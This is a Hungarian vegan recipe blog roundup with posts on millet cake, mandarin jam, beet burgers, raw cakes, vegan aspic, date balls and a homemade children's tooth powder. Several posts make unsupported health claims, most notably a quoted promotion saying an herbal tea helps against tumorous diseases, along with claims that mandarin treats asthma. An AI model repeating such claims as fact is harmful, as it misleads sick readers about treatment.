Ez egy roppant egyszerű, univerzális sütemény. Az alap a köles... ehhez bármit tehetsz, amit csak szeretsz. Bármilyen aszalványt, olajos magot, friss gyümölcsöt vagy éppen lekvárt. Hozzávalók: - 1 csésze köles - 3 csésze növényi tej (én risztejjel készítettem) - 1/2 csésze kókuszreszelék - 1 marék dió - 1 marék mazsola - 1 kávéskanál vaníliapor - 1-2 evőkanál méz vagy juharszirup (ízlés szerint, bár a risztej is édes) - 1 evőkanál kókuszolaj - csipet só - csipet vaníliapor Elkészítése: - Jénaiba mindent beleöntök, és 180 fokon úgy 45 perc alatt megsül. - Félidőben keverjük fel a masszát, hogy a kókusz összekeveredjen a kölessel. Ugyanis az a sülés során feljön a víz tetejére, és sülés alatt ott is marad, A házi szilvalekvárt ekkor lehet belepotyogtatni, hogy az egyben maradjon. - Miután kisült, várjunk vele 1-2 órát, hogy teljesen kihűljön. Akkor szépen szeletelhető.
Mogyorókrémes zabkásával töltött alma
2015. január 25. Mindennapi ételeink
Ez az étel még karácsonyról maradt. Helyesebben fogalmazva nem az étel, hanem az arról készült fotó. :-) Az a jó benne, hogy gyorsan elkészíthető, ehető reggelire, egy kiadós leves után ebédre, de vacsorára is. Egészséges és nagyon finom! :-) Lássuk is a receptet: Hozzávalók: 25 dkg zabpehely 2 dl zabtej 1 csipet só 8-10 dkg nyírfacukor 2-3 tk. kardamom 1 citrom héja almánként egy tk. xilites mogyorókrém mazsola - ízlés szerint (elhagyható) -- dió, agavé szirup - ízlés szerint Elkészítés: Az almákat megmossuk, félbevágjuk és a magházat kiszedjük. Egymás mellé tesszük egy tepsibe őket. Elkészítjük a "tölteléket": a zabtejet felfőzzük, beleöntjük a zabpelyhet és a mazsolát. Amikor megfőtt a zab (kb. 15 perc), beízesítjük és hozzákeverjük a mogyorókrémet is. Az almákat megtöltjük, sziruppal lelocsoljuk és 200 fokon 15-20 perc alatt összesütjük. Melegen, hidegen, akár vaníliasodóval is tálalható. TIPP a mogyorókrém elhagyható.
Fincsi mandarinlekvár
A 18. század a narancs és citrom tündöklésének időszaka. Ám a századforduló után hamarosan -- ha csak rövid időre is -- új különlegesség keltette fel a kor érdeklődését. Ez a növény a mandarin volt. Kína ősi növényének első példánya 1828-ban érkezett Olaszországba. A legfinomabb citromféle azonban nem vált gyorsan közismertté. A mandarin Fülöp-szigeteken és Délkelet-Ázsiában vadon élő növény. A Földközi-tenger térségében, az USA déli részén és Közép-Amerikában is nagy méretekben termesztik a 19. század közepétől.
C-vitaminban való gazdagsága mellett említésre méltó D-vitamin tartalma, amely véd az angolkórtól és K-vitaminja, amely felel a véredények rugalmasságáért. A mandarint asztma és hörghurut (bronchitis) gyógyítására is használják. Nagy mennyiségben tartalmaz sinefrint, amely a gyógyszergyártásban jól ismert ödéma- és hurutellenes szer. A tüdő nyálkától történő megtisztítására minden reggel egy pohár frissen csavart mandarinlé elfogyasztása javasolt.
Ezt a napra emlékeztető gyümölcsöt azonban nem javasolják fogyasztani epehólyag-gyulladás, májgyulladás, gyomor- és nyombélfekély, heveny bélgyulladás esetén.
Nem csak gasztroajándéknak tökéletes, de otthoni fogyasztásra is érdemes elkészíteni ezt a lekvárt.
A recept
Hozzávalók
- 3-4 kg mandarin
- 6-8 szem alma
- Datolya
- Nyírfacukor/gyümölcscukor
- Vanília (opcionális)
- Víz
- Útifűmaghéj
Elkészítés
A mandarinok héját megmossuk, majd megpucoljuk őket. A gyümölcsöket gerezdekre szedjük, fehér száljaiktól is megfosztjuk. Ha van, akkor magját kiszedjük. A megmosott, lereszelt almával a mandarint befőző edénybe tesszük, egy kevés vizet öntünk az aljára és elkezdjük főzni. Szükség esetén botturmix-szal elősegítjük a pépesedést. Amikor már forró a lekvár, a megmosott, felaprított datolyát és egy kevés nyírfa/gyümölcscukrot valamint egy kikapart vaníliát és néhány kanál útifűmaghéjat hozzákeverünk (ez utóbbi zselés, kocsonyás állagot ad neki). Rottyan egyet és kész is. Nem zárjuk le a gázt, hanem a legkisebb lángra vesszük egészen addig, míg az üvegeket megtöltjük a lekvárral.
Az üvegek előkészítése, a befőzés (had)művelete:
Keressünk néhány elfekvőben lévő lehetőleg csinosabb üveget. Győződjünk meg arról, hogy a kupakok épek és rozsda, karcmentesek. Mossuk el őket, ha szükséges, forró mosogatószeres vízben áztassuk le a címkéket. Miután kívül belül a kupakokat és üvegeket eltisztítottuk, fogjunk egy tepsit. Helyezzük az üvegeket és a fedőket a tepsibe. Engedjünk vizet mindegyik üvegbe kb. félig, valamint a tepsibe is öntsünk valamennyi vizet. Sütőbe rakva addig melegítsük, míg az üvegekben a víz forrni kezd. Amikor már felforrt a víz mindegyik üvegben, kivehetjük a sütőből. A felforrósított, átsterilizált üvegekbe szinte azonnal tölthetjük a lekvárokat.
A lekvárok üvegbe töltése: a felforralt üvegekből még szinte forró állapotukban kiöntjük a vizet és a helyére az elkészült mandarin lekvárt öntjük. A megtöltött üvegek tetejére fóliát teszünk. A fedőt alaposan rácsavarjuk, majd előkészített meleg helyre fejjel lefelé állítjuk.
A meleg hely jelen esetben nyári takaró és törölköző párost jelentette egy tiszta lavorban. De máskor már rekeszbe is tettem, doboz sem megvetendő. A lényeg, hogy ezt a "melegdunszt" helyet előbb kell elkészíteni. Az idő alatt, míg a lekvár a tűzön rotyog. Miután fejjel lefelé az összes üveget a száraz, meleg helyre állítottuk, lefedjük őket, hogy melegen tartsuk és így várjuk meg, míg kihűlnek az üvegek. Legalább 24 óra kell nekik. Szóval ellenőrizni ráér másnap. Ha már hidegek az üvegek, akkor érdemes felcímkézni őket, majd pedig hideg, sötét helyen (Pl. pince vagy kamra) tárolni.
Vöröslencsés céklaburger
Kalapos gyorshajtó, észak-koreai diszkódrog, virtuóz vuvuzelás, egészséges junkfood. Na, ez utóbbi korántsem paradoxon. Akkor sem, ha Hombárovics Lajosné hülyén néz a lakókocsiból, ha a balatonakarattyai strandon vöröslencsés céklaburger után érdeklődünk. A következő étellel azon vegánoknak sem feltétlenül lehetnek fenntartásai, akik a biobolton kívül levegőt sem hajlandóak venni.
Kérném előkészíteni az alábbiakat:
130 g vöröslencse 1/2 fej vöröshagyma 2 gerezd fokhagyma 1 db meghámozott, felkockázott célka 1 evőkanál szójaszósz 1 marék petrezselyem apróra nyiszatolva 1/2 kiskanál chili 1/2 kiskanál édes fűszerpaprika 3 evőkanál kókusztej (akár el is hagyható) 100 g teljes kiőrlésű liszt só, bors Hovatovább: 6-7 db császárzsemle néhány salátalevél pár szelet paradicsom hómméd paradicsommártás (pl. felkockázott hagymához és összezúzott fokhagymához párolás után hozzáadunk 2 dl sűrített paradicsomot, kevés chilit és egy kiskanál oregánót, bazsalikomot és sót) A vöröslencséhez hozzáadunk 1l forró vizet, majd kis lángon kb. 12 percig főzzük tapasztaltan, türelmesen. Ha kész, leszűrjük, majd a vöröshagyma és a cékla társaságában összeturmixoljuk, majd egy tálba kiöntve mély szakértelemmel félretesszük. Egy másik, kisebb méretű tálba beleöntjük a szójaszószt, a fűszerpaprikát, a chilit, belenyomjuk a fokhagymát, sózzuk, borsozzuk, majd hozzálötyböljük a vöröslencsés-céklás masszához. Jól összekeverjük, majd hozzáadjuk a kókusztejet és a lisztet. Ha túl totymákosnak találjuk a formázáshoz, további lisztet keverünk bele. Nem lacafacázunk, megsózzuk, borsozzuk. A céklás elegyből pogácsákat formázunk, majd kevés olívaolajban mindkét oldalán kisütjük. Legvégül a felvágott császárzsemlék közé helyezzük a saláta, a paradicsom és a szósz társaságában.
Nyers körtetorta, mert a süti az élet szerves része
2015. január 23. Szelíd életmódváltók
Bizony, a süti is az élet része, még pedig az édes és krémes része, kár lenne kihagyni. Bár a sütikhez gyakran odatapad a bűn mellékíze, itt az ideje levetni. Sütit enni cseppet se bűnös dolog. Sőt. Nagyon egészséges testileg-lelkileg. Persze, nem mindegy, milyen süti és mi van benne, de ami a körtetörtát illeti, bármikor feldobja a hangulatot.
A mennyiségek 16 cm átmérőjű torta formára vonatkoznak, ami egy kis méretű torta. Normális méretűhöz érdemes duplázni a mennyiséget.
Hozzávalók
Torta alap:
2 maréknyi darált dió (előtte áztatott, kiszárított)
1 maréknyi nyers hántolt kendermag
1 ek datolyavíz
Krém:
1 maréknyi datolya (1 éjszakán át áztatva, áztató vízre is szükség lesz)
2 körte
2 kanál kókuszkrém (konzerves)
1 púpos kanál olvasztott (meleg vízfürdőben) kókuszolaj
csipetnyi fahéj
Elkészítés: a darált diót összekeverjük a kendermaggal, és egy kanálnyi datolya vízzel “formálhatóvá” és egyben édesebbé is tesszük. Ezt a masszát nyomkodjuk bele a csatos torta formába.
A datolyát az áztató vízzel együtt, a meghámozott, összevágott körtét, a kókuszkrémet és a fahéjat turmixoljuk össze, majd keverjük bele az olvasztott kókuszolajat. A masszát öntsük rá a torta alapra és tegyük be min. pár órára, de jobb, ha éjszakára, a hűtőbe.
Figyelmeztetés: ennyi kókuszolajból a krém krémes marad, nem folyik szét, de nem megdermedve, mint a “mintasütikben”. Ha valaki nagyon profi kinézésű és állagú sütit akar, több kókuszolaj kell bele. De ettől zsírosabb lesz, úgyhogy maradtam a krémes verziónál. Aki nagyon lájtosat szeretne, kókuszolaj helyett lehet púpos evőkanálnyi utifű maghéjat rakjon bele.
Én elmentem megenni még egy szelettel, mert megérdemlem
Szeretettel és akcentussal,
Rita Bakradze
komfortzóna tágító, coach, önismereti és kreativitásfejlesztési tréner
www.vegtelenlehetoseg.hu
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = //connect.facebook.net/hu_HU/all.js#xfbml=1;
fjs.parentNode.insertBefore(js, fjs);
}(document, script, facebook-jssdk));
Vegán kocsonya
2015. január 20. Zizi kalandjai
Szilveszterre készült életem első kocsonyája, ami természetesen vegán. Úgy gondolom, január még bőven lehet kocsonya szezon, szóval nem késtem el a recepttel, de el is menthetitek év végégre. Imádom a “mindent bele” zöldség leveseket, ez egy ilyen, csak kocsonyásított változatban.
Főzés közben, ahogy puhultak a zöldségek egyre többet ettem belőlük. Imádom a levesben főtt zöldségeket. Gondolatban felidéztem gyerekkorom kocsonyáját és nagyon hasonló hozzá. Egyedül az állaga lett kicsit keményebb, valahogy a húsos verzió puhább, omlósabb, ha lehet ilyet mondani. Az íze viszont nagyon finom, a titok a jó sok zöldség és egy kis extra fűszerezés. A zselés állagot az agar-agar biztosítja, ami tengeri vörösmoszatokból nyert keverék, sűrítő- és gélképző anyagnak használják. Érdekesség, hogy az agar-agar maláj eredetű szó, jelentése kocsonya.
Vegán kocsonya
(Recept inspiráció: The Vegan Baking Bad)
Hozzávalók:
– 2 db nagyobb répa, meghámozva, felkockázva
– 1 db közepes fehérrépa (gyökér), meghámozva, felkockázva
– 3 db közepes burgonya, meghámozva, felkockázva
– 1 db kis karalábé, meghámozva, felkockázva
– 1-2 szál szárzeller, felkockázva
– 1 bögre zöldborsó (fagyasztott)
– 1 fej vöröshagyma, meghámozva
– 4-5 gerezd fokhagyma, meghámozva
– 1 kis darab paradicsom
– 1 kis csokor petrezselyem, felaprítva
– 15-20 g agar-agar
– 1 vegán zöldségleves kocka
– 1 teáskanál kurkuma
– 1 teáskanál édes pirospaprika
– 3 db babérlevél
– 4-5 szem egész feketebors
– 2-3 szem szegfűbors
– só
– szerecsendió
– olívaolaj
Egy nagy lábasban hevítsük fel az olívaolajat és dinszteljük meg rajta a (nagyjából) egyforma kockákra vágott zöldségeket: répa, fehérrépa, burgonya, karalábé, szárzeller. Adjuk hozzá a fűszereket, a leveskockát és sózzuk ízlésünk szerint. Öntsük fel annyi vízzel, amennyi bőven ellepi, tegyük bele a vöröshagymát, fokhagymát, paradicsomot – ezeket mind egészben. Főzzük legalább egy órán keresztül lassú tűzön. Ekkor adjuk hozzá a zöldborsót is és főzzük még 10 percen keresztül.
Én a végén kivettem a vöröshagymát, fokhagymát és paradicsomot, ezeket megettem külön. Vegyük magasabbra a lángot, forraljuk fel és ekkor adjuk hozzá az agar-agart. Folyamatosan kevergessük és főzzük még 3-4 percig, amíg az agar-agar teljesen felolvad.
Vízzel mossuk ki a tálakat, edényeket, tányérokat (nem kell utána megtörölni, maradjanak vizesek!), amelyekbe a kocsonyát hagyjuk megdermedni. Kanalazzuk/öntsük a levest az edényekbe és hagyjuk kihűlni, majd tegyük hűtőbe. Két-három óra elteltével már fogyasztható is. Tálaljuk citrom gerezdekkel.
Tökéletes nyers céklasaláta, avagy így integráld az ellenpólusokat
2015. január 18. Szelíd életmódváltók
Szakmai áldás, hogy még egy receptet is önismerettel fűszerezek. Ez van, ezt szeretem.
Akkor ismét csak a teremtéstörténettel kezdem. Lehet, hogy tudod, lehet, hogy nem, de két teljesen ellentétes szülő gyermekeként jöttem a világra. Nem állok neki felsorolni mindent, csak annyit, amennyi a recepthez szükséges: anyukám lett, ami annyit jelent, hogy északi módon étkeztünk, szinte mindent tejföllel ettünk, meg köménnyel. Apukám meg grúz volt, Ha minimum 5 fajta fűszernövény nem került az ételbe, akkor egy se, meg nincs rendes saláta koriander, fokhagyma és dió nélkül.
Hogy emellett is legyen kis kihívás, éppen nyers kihívás kellős közepén vagyok, tehát bármit is készítek, az nyers és vegán. Magyarul, nincs tejfölös cékla saláta…de, helyette született tökéletes nemzeteken túlmutató vitaminbomba. Hatástalanítani szigorúan tilos
Hozzávalók (1 személyre, tehát kis matektudással a mennyisége szaporítható)
1 közepes cékla
1 közepes alma
1 gerezd fokhagyma
köménymag
só, bors
koriander vagy petrezselyem zöldje
pár szem dió (előtte beáztatott, kiszárított)
Púpozott evőkanál magtejföl*
Magtejföl (Zöld Múzsától tanultam, örök hála!)
1 tálka napraforgó mag (előtte beáztatva)
citromlé
só
1 ek oliva olaj
1 tk édesítőszer (ki mit szeret vagy használ, lehet sztevia, méz, agavé)
Víz (sűrűséget turmixolás közben érdemes figyelni, de kb. fél pohár)
Mindezt összeturmixolni
Elkészítés: céklát, almát és fokhagymát apró lyukú reszelőn lereszelünk és összekeverjük a többi belevalóval. Rászórjuk az apróra vágott diót és zöldeket. Ropogós aszalt keksszel megismételhetetlen! Nem is beszélve arról, hogy mennyire egészséges.
Szeretettel és akcentussal,
Rita Bakradze
komfortzóna tágító, coach, önismereti és kreativitásfejlesztési tréner
www.vegtelenlehetoseg.hu
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = //connect.facebook.net/hu_HU/all.js#xfbml=1;
fjs.parentNode.insertBefore(js, fjs);
}(document, script, facebook-jssdk));
Zsályás-steviás fogpor gyerekeknek
2015. január 17. Éltető ételek
A gyerekek már sokféle fogkrémet kipróbáltak, és persze van kedvenc és kevésbé az. De mivel "eszik' a fogkrémet, tehát három gyerek azért elég sokat elhasznál, így most készítettem házilag nekik fogport. Azért megjegyzem, hogy eléggé fenntartással kezelik az újat, a propoliszos fogkrémet már csak akkor próbálták ki, amikor elfogyott a narancsos. Nem mintha csípős lenne, vagy ilyesmi, hanem egyszerűen a színe miatt voltak előítéletek. Úgyhogy olyan fogport kellett készítenem, ami nem sötét, finom és édes... és az sem baj, ha megeszik... Hozzávalók: - 1 evőkanál fehéragyag - 1 teáskanál szódabikarbóna - 1 tesákanál stevia levél megőrölve - 2 teáskanál zsálya megőrölve - 1/2 kávéskanál fahéj Keverjük össze, és kész is. A nedves fogkefét mártsuk bele a porba, és már moshatjuk is vele a fogunkat. Persze még így is "meg kellett harcolni" a gyerekekkel, hogy kipróbálják, hiszen por alakban van, és egyáltalán nem habzik. A kicsi lányom volt a legfogékonyabb rá, a legnagyobb pedig a legelutasítóbb. A steviáról tudni lehet, hogy annak ellenére, hogy édes, nagyon jó antibakteriális hatása van. A zsálya is kifejezezetten jó szájüregi gyulladások megelőzésére és kezelésére.
Aszalt répakeksz
2015. január 14. Szelíd életmódváltók
Mondtam már, hogy imádom aszalni és imádom az aszalt kekszeket? Alapvetően a keksz az az étel, főleg, ha sós, amit kifejezetten nem szeretek, mert száraz. E logika szerint az aszalt keksznek is ebbe a kategóriába kellene esni, de szerencsére NEM NYERT!
Aszalt kekszben van valami varázslat. Az elkészítési folyamat amolyan alkémikus. Remélem, hogy meggyőztem mindenkit. Aki nálam járt és megkóstolta, az tudja!
Mindjárt leírom a receptet is, csak hozzáfűzöm, hogy ezt a receptet úgy mentettem meg a feledésbe eséstől (tényleg, a feledésbe esnek? a szerelembe biztos, de a feledésről nem vagyok meggyőződve), hogy készítés közben chaten elküldtem, így nyoma maradt.
Hozzávalók:
1 közepes répa
1 közepes petrezselyemgyökér
olivaolaj
balzsamecet
tamari szósz
Himalája só
maréknyi csíráztatott hajdina liszt
őrölt lenmag
lenmag
Elkészítés: az apróra reszelt répát és petrezselyemgyökeret turmixgépben összekeverjük olajjal, tamari szósszal és balzsamecettel. Az őrölt lenmagot kis időre beáztatjuk vízbe, majd hozzáadjuk a hajdina lisztet, a lenmagot, az összeturmixolt masszát és sót. Tapadásmentes aszalólapon aszalógépbenen vagy sütőpapírral kibélelt tepsiben aszaljuk kb. 43 C-on, amíg ropogós nem lesz. Lehet kevesebbet is aszalni, aki puhát szereti.
Avokádókrémmel (villával összenyomott avokádó fokhagymával, sóval, borssal) vagy más krémmel remek párosítás.
Szeretettel és akcentussal,
Rita Bakradze
komfortzóna tágító, coach, önismereti és kreativitásfejlesztési tréner
http://www.vegtelenlehetoseg.hu/
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = //connect.facebook.net/hu_HU/all.js#xfbml=1;
fjs.parentNode.insertBefore(js, fjs);
}(document, script, facebook-jssdk));
Mit eszik a vegagyerek? (vegán baba)
2015. január 13. Zizi kalandjai
Pár hónapja egy nagyon kedves barátnőm felhívott, hogy ő, mint családanya szeretne változtatni a táplálkozási szokásaikon és segítsek ebben neki. Na, azóta nem sikerült időpontot egyeztetnünk, hogy beszélgessünk egy kicsit a témáról. Ha egyszer lesz egy kis felesleges időm, akkor írok majd egy bejegyzést arról, hogy hogyan érdemes elindulni az egészséges(ebb) táplálkozás irányába vagy éppen a vegetáriánus, vegán étkezés irányába. Addig is segítségül szolgálhatnak ezek a bejegyzések, ugyanis nemcsak a vegagyerek eszi ezeket a finomságokat, hanem a vegagyerek szülei is, vagyis az egész család.
Tartjuk magunkat a vegán étrendhez és a cukormentességhez is. Karácsonykor anyukám sütött vegán kalácsot, abban volt egy minimális mennyiségű nádcukor, de mást (csoki, keksz, stb.) Ádi nem evett még. Most kezdtem el adni neki datolya golyókat, ezek ugye édesek és ízlik neki, de nem eszik meg egy egészet, csak nyomot hagy a golyókban. Ezenkívül imádja anyukám cukormentes szilvalekvárját, képes belőle elég sokat enni, ha hozzájut az üveghez.
Reggelire vagy gyümölcsöt vagy kását eszik. Ebédre mindig főzök, kivéve egy-két alkalmat, amikor házon kívül eszünk. Vacsorára pedig hideget adok: olívabogyó, uborka, csírák, savanyú káposzta, avokádó, vegazsíros vagy pástétomos kenyér – ezek variálódnak most a téli időszakban.
Instagramon továbbra is várom a képeiteket #miteszikavegagyerek hashtaggel. Gyűlnek már a képek, de jó lenne minél több, hogy onnan is tudjuk egymást inspirálni!
És akkor jöjjenek az ételek…
Paradicsomos spagetti, édesburgonya fasírt, párolt brokkoli és karfiol
Sütőtökös chili tepsiben sült rozmaringos krumplival
Pirított hagymás csicseriborsó, pirított fokhagymás tofu, pirított fokhagymás citromos leveleskel és rizs
Vegán Alfredo szószos farfalle tészta, párolt fokhagymás zöldbabbal
Bab-zab fasírt maradék zöldbabbal, krumplipüré és pirított fokhagymás répa
Karfiol-barnarizs gratin, sütőtökpüré és pirított fokhagymás citromos leveleskel
Sütőtökös chili, rizs és tortilla chips
Brokkolis sajtos tészta
Édesburgonya chips citromos tahini szósszal, pirított fokhagymás tofu és leveleskel, valamint rizs
Brokkoli és karfiol paradicsomos raguban, kukoricalepény
Tonkabab
A tonkababbal Adorján Éva: Egészséges finomságok című nyers édességes könyvében találkoztam először. Ő több receptjében használta, nagyon felcsigázott, vajon milyen lehet az ízvilága?
Rendeltem az internetről egy dobozzal. Sajnos nagyon sok helyen láttam, hogy hiánycikk, de nem lehetetlen azért beszerezni.
Ízéről, illatáról ódákat zengenek a blogok….. és csak egy csipetnyi kell belőle, hogy finom ízhatást hozzunk létre, ezt írták.
Mikor megérkezett, nagy izgalommal szippantottam a dobozba. Elsőre nem is volt olyan markáns illata, mint amilyenre számítottam. Pedig illóolajként is találkoztam már vele. Hát, az is csodálatos lehet.
Aztán ahogy térültem-fordultam, többször beleszimatoltam a dobozba… most ott tartok, hogy naponta többször beleszagolok.
Mire is hasonlít az illata? Valóban, mint ahogy olvastam, csöpp fahéj, vanília, de a legmarkánsabb íz talán olyan marcipános. Édes-kesernyés, marcipános, ami sejteti már az ízét is.
Ízvilága önmagában nem is olyan kiemelkedően izgalmas. Kicsit kesernyés, mint a keserűmandula. Csokiturmixba reszelve… merthogy reszelni kell, akkor szabadulnak fel legjobban az íz- és illataromái állítólag – nem éreztem nagyon az ízét. Csak kis mennyiség volt, de még próbálkozom majd.
Egy másik receptben: tonkababos nyers csoki szelet – a sütemény tetejére reszeltem. Így jól érezhető, finom, aromás sütemény keletkezett.
Nem ajánlott azonban túlzásba vinni ennek a fűszernek a fogyasztását mérgező kumarin tartalma miatt. A kumarin a fahéj egyik fajtájában is megtalálható, amit szintén fogyasztunk süteménybe, úgyhogy azzal is érdemes csínján bánni.
Aki utána akar olvasni a tonkababnak, az inteneten megteheti, sok cikk található róla, ami engem meglepett, hogy az USÁ-ban illegális fűszernek számít…
Ebben a cikkben nem is az volt a célom, hogy információkat adjak róla, hanem hogy megosszam illat- és íz tapasztalataimat.
Nyers vegán narancsos datolya golyók
2015. január 10. Zizi kalandjai
Hamm bekaplak snack falatok babáknak, anyáknak, apáknak, nagymamának, nagybácsinak… szóval az egész családnak, minden korosztálynak… ahogy a társasjátékokra ráírják például, hogy 4-99 éves korig. Mintha 101 évesen nem lehetne társasozni?
Nálunk olyan nagy sikert arattak ezek a golyók, hogy pár napon belül újabb adag készült belőle. Mindenki csak úgy lopkodja a konyhapultról, Ádi pedig sajátos nyomokat hagy a fogyasztásában. Ő mindegyik golyóba beleharap egy kicsit, de soha nem eszik meg egy teljes golyót.
Legnagyobb mennyiségben diót és mandulát tartalmaz, de ezt kamránk tartalma szerint lecserélhetjük mogyoróra, kesudióra, brazil dióra, stb. A golyó összetapadást és édességét az aszalt datolya és a frissen facsart narancslé biztosítja. Extraként került bele szintén kamrai maradékból: kendermagpor, kakaóbabtöret (köszönet érte Krisztinek, aki Vietnámból hozta) és narancsolaj. A kendermagpor pluszt ad a golyóknak, helyettesíthető bármilyen más szuper élelmiszerrel, de el is hagyható. A kakaóbabtöret azért került bele, mert már fel kellett használnom szavatossági idő miatt; finom csokoládé ízt ad a golyóknak, de ez is elhagyható vagy helyettesíthető kakaó- vagy karobporral. Tudom, hogy ezek drágább alapanyagok, de az egészségünk érdekében néha megéri ilyen édességet fogyasztanunk csokoládé, cukorka vagy túró rudi helyett. Nyugodt szívvel adhatunk belőle a babánknak is (18 hónapos kortól ajánlható, ha nincsen allergia az összetevők egyikére sem!).
A dió kiváló fehérje forrás (lásd diósült), magas a B- és E-vitamin tartalma és jelentős a vas, a kálium, a foszfor és a réz tartalma is. Érdemes vegetáriánusoknak, vegánoknak, de persze húsevőknek is minél többet fogyasztani belőle. Szerencsénk van, az egyik nagypapa kertjében van egy óriási diófa, ő lát el bennünket egész évben dióval. A mandula a dióhoz hasonlóan jó fehérjeforrás, és kiváló B1-, B2- és B6- és E-vitamin forrás. Nyomelemei közül a vas, mangán, cink kiemelendő, ásványi anyagai közül sok benne a magnézium, a kálcium és a kálium. A datolya természetes cukortartalma rendkívül magas, de tartalmaz B-vitamint, kálciumot, magnéziumot, foszfort, rezet, káliumot, cinket illetve vasat is.
Nyers vegán narancsos datolya golyók
Hozzávalók kb. 20-25 db-hoz:
– 1 bögre dió
– 1 bögre mandula
– 18-20 szem aszalt datolya (mérettől függ és attól, hogy mennyire szeretnénk édesre)
– 1 db narancs reszelt héja és 1/2 narancs kifacsart leve
– 2-3 csepp narancsolaj (opcionális)
– 2 evőkanál kakaóbabtöret (opcionális)
– 2 evőkanál kendermagpor
– csipet só
(A recepthez használt bögre 250 ml-es.)
Tegyük robotgépbe a diót és a mandulát és daráljuk por állagúra. Ekkor adjuk hozzá a kimagozott datolyát és az összes többi alapanyagot. Addig dolgoztassuk a robotgépet, amíg a massza enyhén ragacsossá válik (állítsuk le a gépet és ellenőrizzük az állagot).
Formázzunk golyókat a masszából. Zárt dobozban, hűvös helyen 10-12 napig eláll.
*****
A tányérkákat saját magam készítettem Apacuka Kerámia Workshopon.
Bio Világ webáuház
2015. január 8. Mindennapi ételeink
Egyik ismerősöm, aki az egészséges életmód követője, Bio Világ néven bio webáruházat nyitott, hogy másoknak is segítsen: egyszerűen és olcsón különlegességekhez juthassanak. A Biovilág webáruházban vásárolhatunk glutén-és laktózmentes csemegéket is (pl. 9 Bar, ill. Giant Bar szeletek), de két fő specialitása az Immunity 23 gyógytea keverék, illetve a Safe Laser termékek. Ez utóbbiról nem tudok nyilatkozni, a teával kapcsolatban vannak tapasztalataim és információim, amiket megosztanék: a gyártó azt írja, hogy "az Immunity23 gyógytea keverék összeállításánál alkalmaztuk az u.n. Szinergia-Bürghi törvényt amely kimondja ,,azonos gyógyhatású de különböző gyógynövényeket, ha célszerűen keverünk össze, akkor erősebb hatást érünk el, mintha a keverékben szereplő gyógynövényeket külön-külön alkalmaznánk Az Immunity23 teakeverék 23 féle gyógynövényből tevődik össze és együttesen fejti ki jótékony hatását gyulladásos, daganatos és egyéb megbetegedések esetén. A teakeverék hatását felhasználói hagyományok, népi megfigyelések és az elmúlt 50 év tapasztalatai, valamint szakirodalmi adatok igazolják. A gyártó az árbevétel 10%-át rákkutatásra ajánlja fel! Ha van kedvetek, látogassatok el az oldalra és tegyetek egy próbát. Aki kedveli a webáruház facebook oldalát és rendelést ad le januárban a webáruházban, a megrendelt termékek mellé kap eg MaBaker zabszeletet. Részletek a cég facebook oldalán.
Répa-kókusz tejshake
2015. január 7. Gréta konyhája
Bizonyára sokan kezdtek bele az újévben különdéle tisztítókúrákba, egyéb fogadalmakba. A január eleje kifejezetten alkalmas erre, legyen az egészségesebb életmódra törékvés, cukormentesség, húsmentesség, tudatosabb táplálkozás, nyersétkezés, vagy bármi, amely segít visszaállítani, vagy megtalálni végre testi-lelki-szellemi harmóniánkat. Azon túl, hogy a blogomban lévő receptek egyike sem tartalmaz állati eredetű összetevőt( hús, tej és származékai, tojás, méz), mindig figyelek arra, hogy lehetőleg gluténmentes legyen, megfelelő ételpárosítással járjon, egészséges legyen, és ami a legfontosabb, nagyon finom. Ezért is ajánlok most gyorséttermi kedvelt shake-ek helyettesítésére, egy otthon, könnyedén elkészíthető mennyei finomságot, amelyet leginkább délutáni édességre vágyakozás kielégítésére tudok elképzelni, és ami a legjobb, hogy melegen, vagy hidegen egyaránt finom, pénztárcabarát megoldás, amitől garantáltan nem lesz bűntudatunk. A gyorséttermi shake-ekkel ellentétben, az otthon elkészíthető répashake szezonális, nem tartalmaz tejterméket (hormonok, antibiotikum, vér, genny), cukrot, mesterséges adalékanyagokat, szilikonszármazékokat és egyéb mű-anyagot. Mindössze 5 hozzávalóból, egy turmixgép segítségével elkészíthető ez a habos-fűszeres finomság. Hozzávalók: 2 közepes méretű répa meghámozva, megmosva 2-3 dl mandulatej 1 dl kókuszkrém stévia cseppek ízlés szerint mézeskalács fűszerkeverék (fahéj, szegfűszeg, gyömbér, kardamom, szerecsendió) Hideg változat: A répákat 2-3 nagyobb darabra végjuk, majd megfőzzük, ha kihűlt pár órára fagyasztóba tesszük. A fagyott répahasábokat egy turmixgépbe tesszük a többi hozzávalóval, majd kb egy percen keresztül turmixoljuk. Kiöntjük egy nagyobb pohárba, tetejére tehetünk még kókusztejszínhabot, megszórhatjuk fahéjjal. Meleg változat. A répákat megfőzzük, vagy egy tepsiben, sütőben megsütjük, és a fentebb leírtakhoz hasonlóan járunk el, azzal a különbséggel, hogy forráspontig melegített mandulatejet adunk hozzá. Jó étvágyat!
Villámgyors vegán téli zöldséges curry
2015. január 6. Zizi kalandjai
Sikerült visszatérnetek a hétköznapi kerékvágásba? Nekem nagy nehezen… de ténylegesen még nem rázódtam vissza. Karácsonyig és karácsony alatt még neteztem, de utána netböjtöt tartottam és le sem ültem a gép elé, csak a telefonomat nyomkodtam naponta néhány alkalommal. Igazán jól esett, hogy az elmúlt egy hétben ahelyett, hogy esténként a gép előtt ültem volna, inkább megnéztünk minden nap egy új filmet. Juhééé, kezdjük behozni a lemaradást filmek terén. Bárcsak így haladnék a könyv olvasással is. Ki is tűztem célul, hogy 2015-ben legalább hat könyvet elolvasok, ami azt jelenti, hogy két hónapom van egy könyvre. Meglátjuk sikerül-e…
